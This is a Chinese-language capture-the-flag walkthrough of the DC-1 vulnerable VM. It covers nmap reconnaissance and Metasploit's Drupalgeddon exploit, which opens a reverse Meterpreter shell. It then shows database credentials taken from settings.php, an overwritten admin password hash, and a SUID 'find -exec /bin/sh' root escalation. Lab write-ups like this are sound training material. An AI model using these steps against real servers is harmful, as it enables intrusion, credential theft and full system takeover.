Kali 2018, DC-1靶机, VMWare虚拟机平台
使用nmap发现局域网中的主机
shell命令
nmap -sn 192.168.12.0/24
shell输出
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 10:27 CST
Nmap scan report for 192.168.12.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:00 (VMware)
Nmap scan report for 192.168.12.129
Host is up (0.00026s latency).
MAC Address: 00:0C:29:BF:AE:30 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:BC:D6 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.95 seconds
扫描到了4个存活的主机,192.168.12.1是物理机地址,192.168.12.128是本kali机器的地址,经过直接用浏览器访问,得出192.168.12.129就是DC-1靶机的地址。DC-1的http页面如下,网页底部有Powered by Drupal,因此知道了这个网页基于Drupal这个CMS框架。此外,没有多余的有价值的信息可以利用。
进一步扫描端口,在扫描192.168.11.129时发现了如下结果
shell命令
root@kali:~# nmap -p- -A -v 192.168.11.129
shell输出
Nmap scan report for 192.168.12.129
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41785/udp status
|_ 100024 1 56404/tcp status
56404/tcp open status 1 (RPC #100024)
扫描结果显示开启了4个端口,并且扫描出了http默认的80端口下存在robots.txt文件,我们尝试直接访问。在robots.txt中,发现了一些安装/升级/许可证等信息文件。
文件:robots.txt(部分)
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
翻阅多个文件之后,在UPGRADE.txt中,有一些版本信息,推断Drupal的版本应该是7,此外,没有找到其他有价值的内容。
在robots.txt中获取的信息太少,尝试使用msfconsole中的目录扫描器来扫描网站目录。
shell命令
root@kali:~# msfconsole
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.12.129 # 设置远程主机地址
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 20 # 设置并发线程数量
msf5 auxiliary(scanner/http/dir_scanner) > show options
msf5 auxiliary(scanner/http/dir_scanner) > run # 开始扫描
shell输出
Module options (auxiliary/scanner/http/dir_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use
PATH / yes The path to identify files
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.12.129 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 20 yes The number of concurrent threads
VHOST no HTTP server virtual host
[*] Detecting error code
[*] Using code '404' as not found for 192.168.12.129
[+] Found http://192.168.12.129:80/.CVS/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/.../ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/0/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/Admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/USER/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/batch/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/cgi-bin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/icons/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/includes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/misc/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/modules/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/node/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/profiles/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/scripts/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/search/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/sites/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/themes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/user/ 200 (192.168.12.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
很遗憾,扫描出来的页面大多数都是403,几个200的页面也不能提供有价值的信息。
shell命令
msf5 > search drupal
shell输出
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
这些工具一个一个尝试,首先尝试第一个auxiliary/gather/drupal_openid_xxe
,这个工具的描述是openID外部实体注入,尝试之,不能正常工作。尝试第二个auxiliary/scanner/http/drupal_views_user_enum
,这是一个用户枚举工具,也不能正常工作。尝试第三个exploit/multi/http/drupal_drupageddon
,这是一个sql注入工具。
shell命令
msf5 > use exploit/multi/http/drupal_drupageddon
msf5 > set RHOSTS 192.168.12.129
msf5 > run
shell输出
RHOSTS => 192.168.12.129
[*] Started reverse TCP handler on 192.168.12.128:4444
[*] Sending stage (38247 bytes) to 192.168.12.129
[*] Meterpreter session 1 opened (192.168.12.128:4444 -> 192.168.12.129:59507) at 2019-07-15 11:17:35 +0800
meterpreter >
成功了,ls一下,可以看到目录下有一个flag1.txt,cat之。
shell命令
meterpreter > ls
meterpreter > cat flag1.txt
shell输出(部分)
Every good CMS needs a config file - and so do you.
拿到了第一条提示:需要去找drupal的配置文件。百度一下drupal的配置文件默认位置位于sites/default/settings.php
shell命令
cd sites/default/
cat settings.php
shell输出(部分)
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
得到了flag2和本机mysql的一组用户名和密码,所以考虑进入数据库看看有没有可用的信息。
输入mysql -udbuser -p,提示命令无效,输入shell并回车,切换了外壳,再次键入mysql -udbuser -p,输入密码就能进入mysql。进去之后发现一个问题,终端上面不能正常回显信息,尽管如此,还是拿到了经过加密的用户名和密码。
Mysql console输出
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
加密了之后的密文解密相当困难,但是我们可以倒过来考虑,将一个密码加密成密文之后写入数据库,于是需要知道加密算法,这时候可以考虑猜测加密方法一个个试,但这里不这样做(实际上猜测也是不可靠的,因为谁都会想到这些比较通用的加密算法,因此在设计的时候可能会有多种加密算法组合使用,这些算法中也可能有开发人员自己设计的),我在trupal的官网https://www.drupal.org/node/1023428上找到了truple的加密脚本位置./script/password-hash.sh,直接使用这个脚本进行加密。
shell命令
php .\scripts\password-hash.sh 123456
shell输出
password: 123456 hash: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
这里不能进入到scripts目录里面执行这个脚本,进入到里面执行会报错。打开这个脚本查看就能知道原因是这个脚本需要其他文件参与执行,而脚本中写的路径是相对于网站根的相对路径,进入scripts目录执行会找不到文件。
得到密文之后将其写入数据库,这里我执行到update时遇到了一些问题,总是报错,最终我将这个句子拆分输入完成了插入动作。
Mysql console命令
mysql -udbuser -pR0ck3t
use drupaldb
update users set pass=`$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu` where uid=1;
select * from users\G;
Mysql console输出(部分)
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
使用设置好的密码:123456,登陆admin账户,在content页面发现了flag3
于是打开查看
flag3内容
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
提示我们特殊的权限权限有助于发现隐藏内容,这里提到了shadow这个单词,于是立即想到/etc/passwd,先打开看看再说
shell命令
cat /etc/passwd
shell输出
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
直接告诉了我们flag4的位置,打开看看
Shell命令
cd /home/flag4
ls
cat flag4.txt
shell输出(flag4.txt的内容)
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
这句话告诉我们需要提升权限。而根据flag3,find这个命令可能是以root权限执行的,我们随便find一个内容,而-exec可以作为find的一个选项执行命令。
shell命令
find ./ aaa -exec '/bin/sh' \;
whoami
cd /root
ls
cat thefinalflag.txt
shell输出
root
thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
得到root权限和最终flag,游戏结束。
有几个关键点
使用msfconsole
中的exploit/multi/http/drupal_drupageddon
工具,不必深究这个工具是如何得到shell和建立与本机的连接的
find
命令配合-exec
选项提权;在执行这条指令必须指定外壳为/bin/sh
,经过尝试/bin/bash
等其他外壳拿到的不是root权限。
使用exploit/multi/http/drupal_drupageddon
建立连接并键入shell之后回去看不见命令提示符或者无法正常回显等问题,可以在python中开启反向终端终端进行操作(无需root):
python -c 'import pty;pty.spawn("/bin/sh")'